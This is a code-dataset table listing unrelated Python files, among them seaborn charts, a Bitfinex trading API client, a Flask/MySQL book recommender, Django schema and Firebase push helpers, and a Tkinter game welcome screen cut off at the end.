index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
21,900 | ad9282007a0e2fe99ac07c4833291ad589917c93 | #seaborn visualizations. helps visualizations / chart creations in fewer lines as compared to matplotlib
import seaborn as sns
sns.set(style='darkgrid')
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings('ignore')
# Load the BigMart sales dataset (machine-specific absolute path).
data_BM = pd.read_csv(r"C:\Users\vasudevan.gopalan\OneDrive - GAVS Technologies Private Limited\Knowledge Repository\Python\bigmart_data.csv")
#drop null values. Removes rows that has any columns as null
data_BM = data_BM.dropna(how='any')
#multiply by 100 to increase the size, to look better in chart
data_BM['Visibility_Scaled']=data_BM['Item_Visibility']*100
print(data_BM.head())
#line chart
sns.lineplot(x='Item_Weight',y='Item_MRP',data=data_BM[:50])
#use plt show command to display the chart in VS editor itself.
#Since seaborn is built on top of plt, it works this way
plt.show()
#bar chart
sns.barplot(x='Item_Type',y='Item_MRP',data=data_BM[:10])
plt.show()
#histogram
# NOTE(review): sns.distplot is deprecated in seaborn >= 0.11 in favour of
# histplot/displot — confirm the pinned seaborn version before upgrading.
sns.distplot(data_BM['Item_MRP'])
plt.show()
#box plot
sns.boxplot(data_BM['Item_Outlet_Sales'], orient='vertical')
plt.show()
#violin plot
sns.violinplot(data_BM['Item_Outlet_Sales'], orient='vertical', color='magenta')
plt.show()
#scatter plot
sns.relplot(x='Item_MRP',y='Item_Outlet_Sales',data=data_BM[:200],kind='scatter')
plt.show()
#scatter plot with hue semantic. hue gives the 3rd dimension
sns.relplot(x='Item_MRP',y='Item_Outlet_Sales',data=data_BM[:200], hue='Item_Type')
plt.show()
#line plot for different categories of the outlet size. use hue
sns.lineplot(x='Item_Weight',y='Item_MRP',hue='Outlet_Size',data=data_BM[:150])
plt.show()
#bubble plot
sns.relplot(x='Item_MRP',y='Item_Outlet_Sales',data=data_BM[:200], kind='scatter', size='Visibility_Scaled', hue='Visibility_Scaled')
plt.show()
#subplots
# col='Outlet_Size' makes one facet (subplot) per outlet-size category
sns.relplot(x='Item_Weight',y='Item_Visibility',hue='Outlet_Size', style='Outlet_Size', col='Outlet_Size', data=data_BM[:150])
plt.show() |
21,901 | 2b9bdf77a7e31978d1f81e076c086ac44381af60 | #!/bin/python3
from multiprocessing import SimpleQueue
import queue
import register
import json
import time
# The procedure to send a msg to another node (write in its queue)
# Arguments :
# - q_ : the queue to send in
# - sender : the id of the sender
# - receiver : the id of the receiver (need to write in file)
# - name : the type of the message
# - val1 : the fist value to send
# - val2 : the second value to send
# - val3 : the third value to send
# - f_ : the name of the file to register msg in
# Returns : None
def send_to(q_, sender, receiver, name, val1, val2, val3, f_):
    """Send a message to another node by writing into its queue.

    The message is serialised as JSON, and the transmission is also logged
    through register.send_msg so it ends up in the trace file f_.
    """
    message = dict(type=name, val1=val1, val2=val2, val3=val3, sender=sender)
    q_.put(json.dumps(message))
    register.send_msg(sender, receiver, name, val1, val2, val3, f_)
# The fct to receive a msg from another node (read in queue)
# Arguments :
# - q_ : the queue to read in
# - receiver : the id of the receiver (the one who reads in queue)
# - f_ : the name of the file to register msg in
# Returns :
# - {"type":_, "val1":_, "val2":_, "val3":_}
def recv_from(q_, receiver, f_):
    """Blocking read of one message from q_; logs the reception via
    register.recv_msg and returns the decoded message dict
    ({"type":_, "val1":_, "val2":_, "val3":_, "sender":_})."""
    message = json.loads(q_.get())
    register.recv_msg(message["sender"], receiver, message["type"],
                      message["val1"], message["val2"], message["val3"], f_)
    return message
|
21,902 | 63d8a82504b1e0f4549f6419cde1502dba0e5cde | #!/usr/bin/env python
import csv #importing the csv module
# Collect user input lines ("Name, age" format) into a plain text file.
# NOTE: the original comment claimed "read mode" but 'w' opens for writing.
with open("REST_Curl_Log Component.txt", 'w') as txtfile:
    while True:
        entry = input('Write something to file in a Name, age format')
        # Fix: the original tested `entry=='quit' or QUIT`, which raised
        # NameError (QUIT was never defined) for any input other than 'quit'.
        # Accept any casing, matching the intent of the old while condition.
        if entry.upper() == 'QUIT':
            break  # stop without writing the sentinel value
        txtfile.write(entry + '\n')

# Read the collected lines back for conversion to CSV.
with open('REST_Curl_Log Component.txt', 'r') as txtfile:
    data = txtfile.readlines()
print(data)

# Write each whitespace-separated token of every line as a quoted CSV field.
with open('anewfile.csv', 'w') as csvfile:
    # delimiter='\n' puts one field per line; QUOTE_ALL quotes every field
    writer = csv.writer(csvfile, delimiter='\n', quoting=csv.QUOTE_ALL)
    for line in data:
        writer.writerow(line.split())
print("Successfully Done")

# Display the generated CSV content row by row.
with open('anewfile.csv', 'r') as f:
    for row in csv.reader(f):
        print(row)
|
21,903 | bc564b6dde540b0f4190bf9c0f46c51991b8a1a8 | import base64
import hashlib
import hmac
import json
import re
import time
import datetime
import numpy as np
import pandas as pd
import pytz
import requests
import six
from catalyst.assets._assets import TradingPair
from logbook import Logger
from catalyst.exchange.exchange import Exchange
from catalyst.exchange.exchange_bundle import ExchangeBundle
from catalyst.exchange.exchange_errors import (
ExchangeRequestError,
InvalidHistoryFrequencyError,
InvalidOrderStyle, OrderCancelError)
from catalyst.exchange.exchange_execution import ExchangeLimitOrder, \
ExchangeStopLimitOrder, ExchangeStopOrder
from catalyst.finance.order import Order, ORDER_STATUS
from catalyst.protocol import Account
from catalyst.exchange.exchange_utils import get_exchange_symbols_filename, \
download_exchange_symbols
# Trying to account for REST api instability
# https://stackoverflow.com/questions/15431044/can-i-set-max-retries-for-requests-request
requests.adapters.DEFAULT_RETRIES = 20
BITFINEX_URL = 'https://api.bitfinex.com'
from catalyst.constants import LOG_LEVEL
log = Logger('Bitfinex', level=LOG_LEVEL)
warning_logger = Logger('AlgoWarning')
class Bitfinex(Exchange):
def __init__(self, key, secret, base_currency, portfolio=None):
self.url = BITFINEX_URL
self.key = key
self.secret = secret.encode('UTF-8')
self.name = 'bitfinex'
self.color = 'green'
self.assets = {}
self.load_assets()
self.base_currency = base_currency
self._portfolio = portfolio
self.minute_writer = None
self.minute_reader = None
# The candle limit for each request
self.num_candles_limit = 1000
# Max is 90 but playing it safe
# https://www.bitfinex.com/posts/188
self.max_requests_per_minute = 80
self.request_cpt = dict()
self.bundle = ExchangeBundle(self)
def _request(self, operation, data, version='v1'):
payload_object = {
'request': '/{}/{}'.format(version, operation),
'nonce': '{0:f}'.format(time.time() * 1000000),
# convert to string
'options': {}
}
if data is None:
payload_dict = payload_object
else:
payload_dict = payload_object.copy()
payload_dict.update(data)
payload_json = json.dumps(payload_dict)
if six.PY3:
payload = base64.b64encode(bytes(payload_json, 'utf-8'))
else:
payload = base64.b64encode(payload_json)
m = hmac.new(self.secret, payload, hashlib.sha384)
m = m.hexdigest()
# headers
headers = {
'X-BFX-APIKEY': self.key,
'X-BFX-PAYLOAD': payload,
'X-BFX-SIGNATURE': m
}
if data is None:
request = requests.get(
'{url}/{version}/{operation}'.format(
url=self.url,
version=version,
operation=operation
), data={},
headers=headers)
else:
request = requests.post(
'{url}/{version}/{operation}'.format(
url=self.url,
version=version,
operation=operation
),
headers=headers)
return request
def _get_v2_symbol(self, asset):
pair = asset.symbol.split('_')
symbol = 't' + pair[0].upper() + pair[1].upper()
return symbol
def _get_v2_symbols(self, assets):
"""
Workaround to support Bitfinex v2
TODO: Might require a separate asset dictionary
:param assets:
:return:
"""
v2_symbols = []
for asset in assets:
v2_symbols.append(self._get_v2_symbol(asset))
return v2_symbols
    def _create_order(self, order_status):
        """
        Create a Catalyst order object from a Bitfinex order dictionary.

        :param order_status: dict as returned by the Bitfinex v1 order API
        :return: (Order, float) — the order and its average executed price
        """
        # Map Bitfinex boolean flags onto Catalyst order states.
        if order_status['is_cancelled']:
            status = ORDER_STATUS.CANCELLED
        elif not order_status['is_live']:
            log.info('found executed order {}'.format(order_status))
            status = ORDER_STATUS.FILLED
        else:
            status = ORDER_STATUS.OPEN
        # Catalyst expresses sells as negative amounts/fills.
        amount = float(order_status['original_amount'])
        filled = float(order_status['executed_amount'])
        if order_status['side'] == 'sell':
            amount = -amount
            filled = -filled
        price = float(order_status['price'])
        order_type = order_status['type']
        stop_price = None
        limit_price = None
        # Bitfinex order type strings end in 'limit' or 'stop'
        # (e.g. 'exchange limit', 'stop').
        # TODO: is this comprehensive enough?
        if order_type.endswith('limit'):
            limit_price = price
        elif order_type.endswith('stop'):
            stop_price = price
        executed_price = float(order_status['avg_execution_price'])
        # TODO: bitfinex does not specify comission. I could calculate it but not sure if it's worth it.
        commission = None
        # Bitfinex timestamps are epoch seconds (as strings); localize to UTC.
        date = pd.Timestamp.utcfromtimestamp(float(order_status['timestamp']))
        date = pytz.utc.localize(date)
        order = Order(
            dt=date,
            asset=self.assets[order_status['symbol']],
            amount=amount,
            stop=stop_price,
            limit=limit_price,
            filled=filled,
            id=str(order_status['id']),
            commission=commission
        )
        order.status = status
        return order, executed_price
def get_balances(self):
log.debug('retrieving wallets balances')
try:
self.ask_request()
response = self._request('balances', None)
balances = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
if 'message' in balances:
raise ExchangeRequestError(
error='unable to fetch balance {}'.format(balances['message'])
)
std_balances = dict()
for balance in balances:
currency = balance['currency'].lower()
std_balances[currency] = float(balance['available'])
return std_balances
@property
def account(self):
account = Account()
account.settled_cash = None
account.accrued_interest = None
account.buying_power = None
account.equity_with_loan = None
account.total_positions_value = None
account.total_positions_exposure = None
account.regt_equity = None
account.regt_margin = None
account.initial_margin_requirement = None
account.maintenance_margin_requirement = None
account.available_funds = None
account.excess_liquidity = None
account.cushion = None
account.day_trades_remaining = None
account.leverage = None
account.net_leverage = None
account.net_liquidation = None
return account
@property
def time_skew(self):
# TODO: research the time skew conditions
return pd.Timedelta('0s')
def get_account(self):
# TODO: fetch account data and keep in cache
return None
def get_candles(self, data_frequency, assets, bar_count=None,
start_dt=None, end_dt=None):
"""
Retrieve OHLVC candles from Bitfinex
:param data_frequency:
:param assets:
:param bar_count:
:return:
Available Frequencies
---------------------
'1m', '5m', '15m', '30m', '1h', '3h', '6h', '12h', '1D', '7D', '14D',
'1M'
"""
freq_match = re.match(r'([0-9].*)(m|h|d)', data_frequency, re.M | re.I)
if freq_match:
number = int(freq_match.group(1))
unit = freq_match.group(2)
if unit == 'd':
converted_unit = 'D'
else:
converted_unit = unit
frequency = '{}{}'.format(number, converted_unit)
allowed_frequencies = ['1m', '5m', '15m', '30m', '1h', '3h', '6h',
'12h', '1D', '7D', '14D', '1M']
if frequency not in allowed_frequencies:
raise InvalidHistoryFrequencyError(
frequency=data_frequency
)
elif data_frequency == 'minute':
frequency = '1m'
elif data_frequency == 'daily':
frequency = '1D'
else:
raise InvalidHistoryFrequencyError(
frequency=data_frequency
)
# Making sure that assets are iterable
asset_list = [assets] if isinstance(assets, TradingPair) else assets
ohlc_map = dict()
for asset in asset_list:
symbol = self._get_v2_symbol(asset)
url = '{url}/v2/candles/trade:{frequency}:{symbol}'.format(
url=self.url,
frequency=frequency,
symbol=symbol
)
if bar_count:
is_list = True
url += '/hist?limit={}'.format(int(bar_count))
def get_ms(date):
epoch = datetime.datetime.utcfromtimestamp(0)
epoch = epoch.replace(tzinfo=pytz.UTC)
return (date - epoch).total_seconds() * 1000.0
if start_dt is not None:
start_ms = get_ms(start_dt)
url += '&start={0:f}'.format(start_ms)
if end_dt is not None:
end_ms = get_ms(end_dt)
url += '&end={0:f}'.format(end_ms)
else:
is_list = False
url += '/last'
try:
self.ask_request()
response = requests.get(url)
except Exception as e:
raise ExchangeRequestError(error=e)
if 'error' in response.content:
raise ExchangeRequestError(
error='Unable to retrieve candles: {}'.format(
response.content)
)
candles = response.json()
def ohlc_from_candle(candle):
last_traded = pd.Timestamp.utcfromtimestamp(
candle[0] / 1000.0)
last_traded = last_traded.replace(tzinfo=pytz.UTC)
ohlc = dict(
open=np.float64(candle[1]),
high=np.float64(candle[3]),
low=np.float64(candle[4]),
close=np.float64(candle[2]),
volume=np.float64(candle[5]),
price=np.float64(candle[2]),
last_traded=last_traded
)
return ohlc
if is_list:
ohlc_bars = []
# We can to list candles from old to new
for candle in reversed(candles):
ohlc = ohlc_from_candle(candle)
ohlc_bars.append(ohlc)
ohlc_map[asset] = ohlc_bars
else:
ohlc = ohlc_from_candle(candles)
ohlc_map[asset] = ohlc
return ohlc_map[assets] \
if isinstance(assets, TradingPair) else ohlc_map
def create_order(self, asset, amount, is_buy, style):
"""
Creating order on the exchange.
:param asset:
:param amount:
:param is_buy:
:param style:
:return:
"""
exchange_symbol = self.get_symbol(asset)
if isinstance(style, ExchangeLimitOrder) \
or isinstance(style, ExchangeStopLimitOrder):
price = style.get_limit_price(is_buy)
order_type = 'limit'
elif isinstance(style, ExchangeStopOrder):
price = style.get_stop_price(is_buy)
order_type = 'stop'
else:
raise InvalidOrderStyle(exchange=self.name,
style=style.__class__.__name__)
req = dict(
symbol=exchange_symbol,
amount=str(float(abs(amount))),
price="{:.20f}".format(float(price)),
side='buy' if is_buy else 'sell',
type='exchange ' + order_type, # TODO: support margin trades
exchange=self.name,
is_hidden=False,
is_postonly=False,
use_all_available=0,
ocoorder=False,
buy_price_oco=0,
sell_price_oco=0
)
date = pd.Timestamp.utcnow()
try:
self.ask_request()
response = self._request('order/new', req)
order_status = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
if 'message' in order_status:
raise ExchangeRequestError(
error='unable to create Bitfinex order {}'.format(
order_status['message'])
)
order_id = str(order_status['id'])
order = Order(
dt=date,
asset=asset,
amount=amount,
stop=style.get_stop_price(is_buy),
limit=style.get_limit_price(is_buy),
id=order_id
)
return order
def get_open_orders(self, asset=None):
"""Retrieve all of the current open orders.
Parameters
----------
asset : Asset
If passed and not None, return only the open orders for the given
asset instead of all open orders.
Returns
-------
open_orders : dict[list[Order]] or list[Order]
If no asset is passed this will return a dict mapping Assets
to a list containing all the open orders for the asset.
If an asset is passed then this will return a list of the open
orders for this asset.
"""
try:
self.ask_request()
response = self._request('orders', None)
order_statuses = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
if 'message' in order_statuses:
raise ExchangeRequestError(
error='Unable to retrieve open orders: {}'.format(
order_statuses['message'])
)
orders = []
for order_status in order_statuses:
order, executed_price = self._create_order(order_status)
if asset is None or asset == order.sid:
orders.append(order)
return orders
def get_order(self, order_id):
"""Lookup an order based on the order id returned from one of the
order functions.
Parameters
----------
order_id : str
The unique identifier for the order.
Returns
-------
order : Order
The order object.
"""
try:
self.ask_request()
response = self._request(
'order/status', {'order_id': int(order_id)})
order_status = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
if 'message' in order_status:
raise ExchangeRequestError(
error='Unable to retrieve order status: {}'.format(
order_status['message'])
)
return self._create_order(order_status)
def cancel_order(self, order_param):
"""Cancel an open order.
Parameters
----------
order_param : str or Order
The order_id or order object to cancel.
"""
order_id = order_param.id \
if isinstance(order_param, Order) else order_param
try:
self.ask_request()
response = self._request('order/cancel', {'order_id': order_id})
status = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
if 'message' in status:
raise OrderCancelError(
order_id=order_id,
exchange=self.name,
error=status['message']
)
def tickers(self, assets):
"""
Fetch ticket data for assets
https://docs.bitfinex.com/v2/reference#rest-public-tickers
:param assets:
:return:
"""
symbols = self._get_v2_symbols(assets)
log.debug('fetching tickers {}'.format(symbols))
try:
self.ask_request()
response = requests.get(
'{url}/v2/tickers?symbols={symbols}'.format(
url=self.url,
symbols=','.join(symbols),
)
)
except Exception as e:
raise ExchangeRequestError(error=e)
if 'error' in response.content:
raise ExchangeRequestError(
error='Unable to retrieve tickers: {}'.format(
response.content)
)
try:
tickers = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
ticks = dict()
for index, ticker in enumerate(tickers):
if not len(ticker) == 11:
raise ExchangeRequestError(
error='Invalid ticker in response: {}'.format(ticker)
)
ticks[assets[index]] = dict(
timestamp=pd.Timestamp.utcnow(),
bid=ticker[1],
ask=ticker[3],
last_price=ticker[7],
low=ticker[10],
high=ticker[9],
volume=ticker[8],
)
log.debug('got tickers {}'.format(ticks))
return ticks
def generate_symbols_json(self, filename=None, source_dates=False):
symbol_map = {}
if not source_dates:
fn, r = download_exchange_symbols(self.name)
with open(fn) as data_file:
cached_symbols = json.load(data_file)
response = self._request('symbols', None)
for symbol in response.json():
if (source_dates):
start_date = self.get_symbol_start_date(symbol)
else:
try:
start_date = cached_symbols[symbol]['start_date']
except KeyError as e:
start_date = time.strftime('%Y-%m-%d')
try:
end_daily = cached_symbols[symbol]['end_daily']
except KeyError as e:
end_daily = 'N/A'
try:
end_minute = cached_symbols[symbol]['end_minute']
except KeyError as e:
end_minute = 'N/A'
symbol_map[symbol] = dict(
symbol=symbol[:-3] + '_' + symbol[-3:],
start_date=start_date,
end_daily=end_daily,
end_minute=end_minute,
)
if (filename is None):
filename = get_exchange_symbols_filename(self.name)
with open(filename, 'w') as f:
json.dump(symbol_map, f, sort_keys=True, indent=2,
separators=(',', ':'))
def get_symbol_start_date(self, symbol):
print(symbol)
symbol_v2 = 't' + symbol.upper()
"""
For each symbol we retrieve candles with Monhtly resolution
We get the first month, and query again with daily resolution
around that date, and we get the first date
"""
url = '{url}/v2/candles/trade:1M:{symbol}/hist'.format(
url=self.url,
symbol=symbol_v2
)
try:
self.ask_request()
response = requests.get(url)
except Exception as e:
raise ExchangeRequestError(error=e)
"""
If we don't get any data back for our monthly-resolution query
it means that symbol started trading less than a month ago, so
arbitrarily set the ref. date to 15 days ago to be safe with
+/- 31 days
"""
if (len(response.json())):
startmonth = response.json()[-1][0]
else:
startmonth = int((time.time() - 15 * 24 * 3600) * 1000)
"""
Query again with daily resolution setting the start and end around
the startmonth we got above. Avoid end dates greater than now: time.time()
"""
url = '{url}/v2/candles/trade:1D:{symbol}/hist?start={start}&end={end}'.format(
url=self.url,
symbol=symbol_v2,
start=startmonth - 3600 * 24 * 31 * 1000,
end=min(startmonth + 3600 * 24 * 31 * 1000,
int(time.time() * 1000))
)
try:
self.ask_request()
response = requests.get(url)
except Exception as e:
raise ExchangeRequestError(error=e)
return time.strftime('%Y-%m-%d',
time.gmtime(int(response.json()[-1][0] / 1000)))
def get_orderbook(self, asset, order_type='all', limit=100):
exchange_symbol = asset.exchange_symbol
try:
self.ask_request()
# TODO: implement limit
response = self._request(
'book/{}'.format(exchange_symbol), None)
data = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
# TODO: filter by type
result = dict()
for order_type in data:
result[order_type] = []
for entry in data[order_type]:
result[order_type].append(dict(
rate=float(entry['price']),
quantity=float(entry['amount'])
))
return result
|
21,904 | 8593dab08a7b48d2a1912c030291fb105a32f000 | """
Base class for data structures
"""
from tools.xl import read_dframe
class Block:
    """Base class for data structures.

    Subclasses declare three lists of property names via prepare()/get_props():
    props_v (scalar values), props_l (lists) and props_d (dicts).
    """
    def __init__(self, *args, **kwargs):
        # set properties
        # named args first: every value prop defaults to None unless passed
        for p in self.props_v:
            val = kwargs.get(p, None)
            setattr(self, p, val)
        # now reset if unnamed exist: positional args override the keyword
        # values, matched by position against props_v
        for i, val in enumerate(args):
            setattr(self, self.props_v[i], val)
        # List props start out as fresh empty lists
        for p in self.props_l:
            setattr(self, p, [])
        # Dict props start out as fresh empty dicts
        # (the original comment here wrongly said "List props")
        for p in self.props_d:
            setattr(self, p, {})
    def __repr__(self):
        # ClassName(prop = value, ...) over the scalar props only
        cname = type(self).__name__
        values = [p + " = " + str(getattr(self, p)) for p in self.props_v]
        params = ", ".join(values)
        return '{0}({1})'.format(cname, params)
    @classmethod
    def get_props(cls, props):
        # props maps "V"/"L"/"D" to lists of property names; absent kinds
        # default to no properties
        cls.props_v = props.get("V", [])
        cls.props_l = props.get("L", [])
        cls.props_d = props.get("D", [])
    @classmethod
    def prepare(cls, all_props):
        # Pick this class's property spec out of the global spec by class name
        cls.get_props(all_props[cls.__name__])
    @classmethod
    def aggregate(cls, *args):
        # Zip positional values against props_v; the first value doubles as key
        key = args[0]
        obj = dict(zip(cls.props_v, args))
        return (key, obj)
    @classmethod
    def pcs_input(cls, **kwargs):
        """Read rows from the spreadsheet kwargs['fname'] and build a dict of
        row objects keyed by each row's key.

        NOTE(review): relies on cls.pcs_row, which subclasses must define.
        """
        #from tools.xl import read_file
        #_, rows = read_file(kwargs['fname'])
        _, rows = read_dframe(kwargs['fname'])
        obj_info = {}
        for row in rows:
            key, obj = cls.pcs_row(row)
            #key, obj = cls.pcs_row(*row)
            obj_info[key] = obj
        return obj_info
|
21,905 | c471e6217ab632ac29c6a89df64e8c2067377364 | from flask import Flask, render_template, url_for
from flask_mysqldb import MySQL
import pickle
import yaml
# Read model
def output_recommendations(book_name):
    """Load the pickled recommendation model and return the list of books
    recommended for *book_name*.

    NOTE(review): pickle.load executes arbitrary code from the file —
    'saved_model.pkl' must be a trusted, locally produced artifact.
    """
    with open('saved_model.pkl', 'rb') as saved_model:
        loaded_model = pickle.load(saved_model)
        book_list = loaded_model.corpus_recommendations(book_name)
    return book_list
# Get details of recommended books
def get_details(book_list):
    """Look up the cover-image URL for each recommended book.

    :param book_list: iterable of book titles
    :return: dict mapping title -> image URL string, or None when not found
    """
    img_list = {}
    cur = mysql.connection.cursor()
    for book in book_list:
        found = cur.execute(
            "SELECT image_url FROM books WHERE title = %s LIMIT 1", (book,))
        if found > 0:
            # Fix: fetch the scalar directly instead of slicing the string
            # repr of fetchall() (img[3:-5]) — that hack broke for URLs
            # containing quote characters and depended on tuple formatting.
            img_list[book] = cur.fetchone()[0]
        else:
            img_list[book] = None
    return img_list
app = Flask(__name__)
# Fix: yaml.load without an explicit Loader is deprecated and can construct
# arbitrary Python objects; safe_load restricts input to plain data. The
# original also leaked the file handle returned by open().
with open('db.yaml') as db_file:
    db = yaml.safe_load(db_file)
# Configure DB
app.config['MYSQL_HOST'] = db['mysql_host']
app.config['MYSQL_USER'] = db['mysql_user']
app.config['MYSQL_PASSWORD'] = db['mysql_password']
app.config['MYSQL_DB'] = db['mysql_db']
app.config['MYSQL_PORT'] = db['mysql_port']
mysql = MySQL(app)
@app.route('/')
@app.route('/books')
def books():
    """List every book; renders testbooks.html."""
    cur = mysql.connection.cursor()
    resultValue = cur.execute("SELECT * FROM books")
    if resultValue > 0:
        books = cur.fetchall()
        return render_template('testbooks.html', books = books)
    # Fix: the original fell off the end (implicit None) when the table was
    # empty, which makes Flask raise a 500; return an explicit response,
    # mirroring the 'No book' fallback used by book_details.
    return 'No books'
@app.route('/book_details/<book_title>')
def book_details(book_title):
    """Detail page for one book plus its recommendations.

    Renders book_details.html with the book row and a dict mapping each
    recommended title to its cover-image URL; returns 'No book' for an
    unknown title.
    """
    cur = mysql.connection.cursor()
    resultValue = cur.execute("SELECT * FROM books WHERE title = %s LIMIT 1", (book_title,))
    if resultValue > 0:
        rec_book_list = output_recommendations(book_title)
        book = cur.fetchall()
        recom_books_details = get_details(rec_book_list)
        return render_template('book_details.html', book = book, book_dict = recom_books_details)
    return 'No book'
if __name__ == '__main__':
app.run(debug=True) |
21,906 | 0cb306b986311933e2dfe2b5794c9f0beae886c5 | import json, multiprocessing.pool, sys
import requests
ids = []

def make_request(id):
    """Fetch one tournament record from the fftbg API."""
    return requests.get("https://fftbg.com/api/tournament/" + str(id))

# Collect the tournament IDs from the JSON-lines input file given on argv.
with open(sys.argv[1]) as in_f:
    ids = [json.loads(line)['ID'] for line in in_f]

# Fetch all tournaments concurrently, then echo each as one JSON line.
with multiprocessing.pool.ThreadPool(12) as p:
    tournaments = p.map(make_request, ids)
for t in tournaments:
    print(json.dumps(t.json()))
|
21,907 | 1f326501b7104cbb70fcf677c9937669cbdd5a1b | class Solution:
def rob(self, nums) -> int:
n = len(nums)
sols = [0] * (n + 1)
sols[1] = nums[0]
for i in range(2, n + 1):
sols[i] = max(sols[i - 2] + nums[i - 1], sols[i - 1])
return sols[-1]
|
21,908 | 1202ad05def9d92e4acdce8f53f1a9ba5b745dd3 | # -*- coding:utf-8 -*-
# Send a plain-text e-mail via the quickmail helper library.
from quickmail import QuickEmail
# Create a QuickEmail instance
qe = QuickEmail()
# Set the list of recipient addresses
qe.add_tolist(['2838654353@qq.com'])
# Set the mail subject and body; mail_type defaults to plain text
qe.set_mail('标题:测试邮件', '这是一个纯文本邮件 sent by quickEmail', mail_type='plain')
# Send the mail over SSL
qe.send_mail(ssl=True)
|
21,909 | 7b715fa289ff4791d2feb9386693ffb95fc3c706 | from database import Database
from models.post import Post
# Smoke test: initialise the DB layer, build a sample post, echo its fields.
Database.initialize()
post = Post("Post1 title", "Post1 content", "Post1 author")
print(post.content)
print(post.author)
|
21,910 | 6d2eb0f2cb00d62625f5fd1d3533621a7c069d4d |
from rest_framework.schemas import AutoSchema
from django.conf import settings
import requests
import json
class CustomSchema(AutoSchema):
    """AutoSchema variant that lets the caller supply manual schema fields per
    DRF action ('list', 'create', 'retrieve', 'update', 'partial_update',
    'delete') through a single dict passed to the constructor.

    Fix: the original stored the defaults as mutable class attributes
    (schema_list = [] etc.), so every instance constructed without a given
    key shared — and could accidentally mutate — the same list object.
    Defaults are now fresh per-instance lists.
    """

    def __init__(self, schema):
        super(CustomSchema, self).__init__(None)
        self.schema_list = schema.get('list', [])
        self.schema_create = schema.get('create', [])
        self.schema_retrieve = schema.get('retrieve', [])
        self.schema_update = schema.get('update', [])
        self.schema_partial_update = schema.get('partial_update', [])
        self.schema_delete = schema.get('delete', [])

    # Action predicates: DRF detail endpoints carry '{id}' in the path.
    def is_list(self, path, method):
        return method == 'GET' and not '{id}' in path

    def is_create(self, path, method):
        return method == 'POST' and not '{id}' in path

    def is_retrieve(self, path, method):
        return method == 'GET' and '{id}' in path

    def is_update(self, path, method):
        return method == 'PUT' and '{id}' in path

    def is_partial_update(self, path, method):
        return method == 'PATCH' and '{id}' in path

    def is_delete(self, path, method):
        return method == 'DELETE' and '{id}' in path

    def get_manual_fields(self, path, method):
        """Return the manual fields configured for the action matching
        (path, method); None when no action matches (as before)."""
        super().get_manual_fields(path, method)
        if self.is_list(path, method):
            return self.schema_list
        elif self.is_create(path, method):
            return self.schema_create
        elif self.is_retrieve(path, method):
            return self.schema_retrieve
        elif self.is_update(path, method):
            return self.schema_update
        elif self.is_partial_update(path, method):
            return self.schema_partial_update
        elif self.is_delete(path, method):
            return self.schema_delete
def send_fcm(device, notification=None, data=None):
    """Push a Firebase Cloud Messaging message to a single device.

    :param device: object exposing an fcm_token attribute and a delete() method
    :param notification: optional FCM 'notification' payload dict
    :param data: optional FCM 'data' payload dict
    """
    url = 'https://fcm.googleapis.com/fcm/send'
    # Devices that never registered a token are silently skipped.
    if device.fcm_token == 'noToken': return
    headers = {
        'Authorization': 'key=%s'%settings.FCM_SERVER_KEY,
        'Content-Type': 'application/json; UTF-8',
    }
    content = {
        'to':device.fcm_token
    }
    if notification:
        content['notification'] = notification
    if data:
        content['data'] = data
    r = requests.post(url, data=json.dumps(content), headers=headers)
    result = json.loads(r.text)
    # FCM reports per-message success counts; success == 0 is treated here as
    # a stale token, so the device record is removed.
    if result['success'] == 0:
        device.delete()
21,911 | 496727dbee04bd9c7232b52955a5245f0e649f2f | # Generated by Django 2.1.5 on 2019-02-07 21:54
from django.db import migrations, models
class Migration(migrations.Migration):
    """Staff 0008: make doctor.email unique and give doctor.image a default."""
    dependencies = [
        ('Staff', '0007_auto_20190206_1854'),
    ]
    operations = [
        migrations.AlterField(
            model_name='doctor',
            name='email',
            field=models.EmailField(max_length=70, unique=True),
        ),
        migrations.AlterField(
            model_name='doctor',
            name='image',
            field=models.ImageField(default='default.jpg', upload_to='profile_pics'),
        ),
    ]
|
21,912 | 27e6eef2b22248a90282f2f2c3dd952671d29036 | #--------------------------------Imports---------------------------------------#
try: import Tkinter as Tk
except ImportError: import tkinter as Tk
import os
if False:
import gameScreen
#------------------------------Root--------------------------------------------#
root = Tk.Tk()
root.title("Forbidden Island")
root.attributes("-fullscreen", True)
root.update()
WIDTH = int(root.winfo_screenwidth())
HEIGHT = int(root.winfo_screenheight())
welcomeFrame = Tk.Frame(root, width=WIDTH, height=HEIGHT)
welcomeFrame.pack(anchor=Tk.CENTER)
#----------------------------------Functions-----------------------------------#
def play_the_game():
    """Start the game by tearing down the welcome screen.

    NOTE(review): presumably gameScreen takes over afterwards — confirm.
    """
    welcomeFrame.destroy()
    # TODO: Brings down options for
def open_rulebook():
    """Open the PDF rulebook in the OS default viewer (Windows: os.startfile).

    Fix: the original called os.chdir("./Assets") before os.startfile, which
    permanently changed the process working directory — a second click then
    looked for ./Assets/Assets and raised FileNotFoundError. Building the
    relative path instead leaves the CWD untouched.
    """
    os.startfile(os.path.join("Assets", "ForbiddenIslandTM-RULES.pdf"))
"""def canvasEvent(e):
def isInBox(e, x1,y1, x2,y2):
return False
if isInBox(e, 100,100, 125,125):
play_the_game()
elif isInBox(e, 150,150, 175,175):
open_rulebook()
else:
print("Invalid pos")
print(e.keysym)"""
#-------------------------------Background Image-------------------------------#
canvas = Tk.Canvas(welcomeFrame)
canvas.place(relx=0, rely=0, relwidth=1.0, relheight=1.0)
bgImg = Tk.PhotoImage(file="Assets/new_background.png") # 1024x715
# TODO: Resize later in photoshop
canvas.create_image(WIDTH//2, HEIGHT//2, image=bgImg)
#------------------------------------Buttons-----------------------------------#
#playRect = canvas.create_rectangle(100,100, 150,150, tags=["action", "play"])
#ruleRect = canvas.create_rectangle(200,200, 250,250, tags=["action", "rules"])
#canvas.tag_bind(playRect, "<Button-1>", play_the_game)
#canvas.tag_bind(ruleRect, "<Button-1>", open_rulebook)
#canvas.bind("<Button-1>", canvasEvent)
play_button = Tk.Button(welcomeFrame, text="Play", command=play_the_game)
play_button.place(relx=0.5,rely=0.5 , relwidth=0.1,relheight=0.1) # Align up with img
